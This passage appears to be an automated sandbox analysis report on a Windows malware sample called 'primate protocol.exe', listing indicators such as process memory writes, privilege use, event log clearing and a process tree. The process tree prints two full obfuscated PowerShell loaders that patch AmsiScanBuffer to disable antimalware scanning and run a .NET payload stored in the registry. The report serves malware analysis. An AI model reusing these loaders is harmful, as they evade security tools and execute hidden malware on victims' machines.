Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3556 Explorer.EXE 3556 Explorer.EXE 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 6000 msedge.exe 6000 msedge.exe 2016 chrome.exe 3556 Explorer.EXE 3556 Explorer.EXE -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 3556 Explorer.EXE 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE 3556 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3880 systemprocess.exe 4064 OpenWith.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3556 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2492 wrote to memory of 4440 2492 primate protocol.exe 88 PID 2492 wrote to memory of 4440 2492 primate protocol.exe 88 PID 2492 wrote to memory of 4440 2492 primate protocol.exe 88 PID 2492 wrote to memory of 2336 2492 primate protocol.exe 89 PID 2492 wrote to memory of 2336 2492 primate protocol.exe 89 PID 2492 wrote to memory of 2336 2492 primate protocol.exe 89 PID 2492 wrote to memory of 3880 2492 primate protocol.exe 92 PID 2492 wrote to memory of 3880 2492 primate protocol.exe 92 PID 2492 wrote to memory of 5948 2492 primate protocol.exe 93 PID 2492 wrote to memory of 5948 2492 primate protocol.exe 93 PID 2492 wrote to memory of 1060 2492 primate protocol.exe 94 PID 2492 wrote to memory of 1060 2492 primate protocol.exe 94 PID 3880 wrote to memory of 4756 3880 systemprocess.exe 95 PID 3880 wrote to memory of 4756 3880 systemprocess.exe 95 PID 1060 wrote to memory of 4760 1060 CompPkg.exe 97 PID 1060 wrote to memory of 4760 1060 CompPkg.exe 97 PID 1928 wrote to memory of 4904 1928 cmd.exe 101 PID 1928 wrote to memory of 4904 1928 cmd.exe 101 PID 3880 wrote to memory of 4036 3880 systemprocess.exe 104 PID 3880 wrote to memory of 4036 3880 systemprocess.exe 104 PID 3880 wrote to memory of 2592 3880 systemprocess.exe 106 PID 3880 wrote to memory of 2592 3880 systemprocess.exe 106 PID 5948 wrote to memory of 704 5948 host.exe 118 PID 5948 wrote to memory of 704 5948 host.exe 118 PID 5948 wrote to memory of 704 5948 host.exe 118 PID 5948 wrote to memory of 704 5948 host.exe 118 PID 5948 wrote to memory of 704 5948 host.exe 118 PID 5948 wrote to memory of 704 5948 host.exe 118 PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 wrote to memory of 4832 1632 ijujdfuujtjk.exe 142 PID 1632 wrote to memory of 4832 1632 ijujdfuujtjk.exe 142 PID 1632 wrote to memory of 4832 1632 ijujdfuujtjk.exe 142 PID 1632 wrote to memory of 4832 1632 ijujdfuujtjk.exe 142 PID 1632 wrote to memory of 4832 1632 ijujdfuujtjk.exe 142 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 PID 3148 wrote to memory of 616 3148 dllhost.exe 5 PID 3148 wrote to memory of 672 3148 dllhost.exe 7 PID 3148 wrote to memory of 960 3148 dllhost.exe 12 PID 3148 wrote to memory of 336 3148 dllhost.exe 13 PID 3148 wrote to memory of 408 3148 dllhost.exe 14 PID 3148 wrote to memory of 1044 3148 dllhost.exe 15 PID 3148 wrote to memory of 1072 3148 dllhost.exe 17 PID 3148 wrote to memory of 1080 3148 dllhost.exe 18 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3dc28f87-b8e3-4dfa-a166-a006b4a498ba}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ec80ab00-b363-4b21-bbe8-85111939d665}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1204 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OdjsqXVEoMxo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yfmVlGOStjgHBO,[Parameter(Position=1)][Type]$UJRGIblVoq)$hIprbDofzkL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+'M'+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$hIprbDofzkL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'e'+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yfmVlGOStjgHBO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+'n'+'a'+'g'+[Char](101)+''+[Char](100)+'');$hIprbDofzkL.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$UJRGIblVoq,$yfmVlGOStjgHBO).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+'a'+'n'+''+'a'+'g'+'e'+''+'d'+'');Write-Output $hIprbDofzkL.CreateType();}$vyVsTzFyMRkLJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'yst'+[Char](101)+''+[Char](109)+'.dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$bYPnAmzEfuscSx=$vyVsTzFyMRkLJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+'t'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZDRpFjDocdPWEvpSmDG=OdjsqXVEoMxo @([String])([IntPtr]);$nfWTHpcRSoEqqeFdfiOtpn=OdjsqXVEoMxo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wEXXhkFtbyb=$vyVsTzFyMRkLJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oleLiZxwkOLAwO=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$PiJGUFQYEknHQZPKx=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$HEIoPYX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oleLiZxwkOLAwO,$ZDRpFjDocdPWEvpSmDG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uXiOiPrfOfLHHnfYI=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$HEIoPYX,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+'nB'+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zhrGrazrmt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,4,[ref]$zhrGrazrmt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXiOiPrfOfLHHnfYI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,0x20,[ref]$zhrGrazrmt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hUtTGcpIBRWx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cuszbhKDZHUugU,[Parameter(Position=1)][Type]$TzthIiuPXy)$BpDXKpeuMBK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+''+'m'+''+'o'+'ry'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'e'+'a'+'l'+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$BpDXKpeuMBK.DefineConstructor(''+'R'+'T'+'S'+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+'lN'+[Char](97)+'m'+'e'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$cuszbhKDZHUugU).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+','+'Man'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$BpDXKpeuMBK.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$TzthIiuPXy,$cuszbhKDZHUugU).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BpDXKpeuMBK.CreateType();}$AeIOUWqdeFhrt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$iTlDFUyQFnghAn=$AeIOUWqdeFhrt.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+','+[Char](83)+''+'t'+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZlMhhgPuJPEJZMiKYVc=hUtTGcpIBRWx @([String])([IntPtr]);$DGoBTzKEyyvelOULPFuXKR=hUtTGcpIBRWx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$erEVRAlXqJK=$AeIOUWqdeFhrt.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$OkQLxsSoUiELgP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$JRRmeUNoqiZyPvdtP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$eycvYqX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OkQLxsSoUiELgP,$ZlMhhgPuJPEJZMiKYVc).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$dBFykBqhboaywzxVD=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$eycvYqX,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+'fe'+'r'+'')));$aYFVrPYVCg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,4,[ref]$aYFVrPYVCg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dBFykBqhboaywzxVD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,0x20,[ref]$aYFVrPYVCg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Executes dropped EXE
PID:3096
-
-
C:\Users\Admin\AppData\Roaming\CompPkg.exeC:\Users\Admin\AppData\Roaming\CompPkg.exe2⤵
- Executes dropped EXE
PID:5876
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2796
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1484
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1772
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2804
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3468
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2492 -
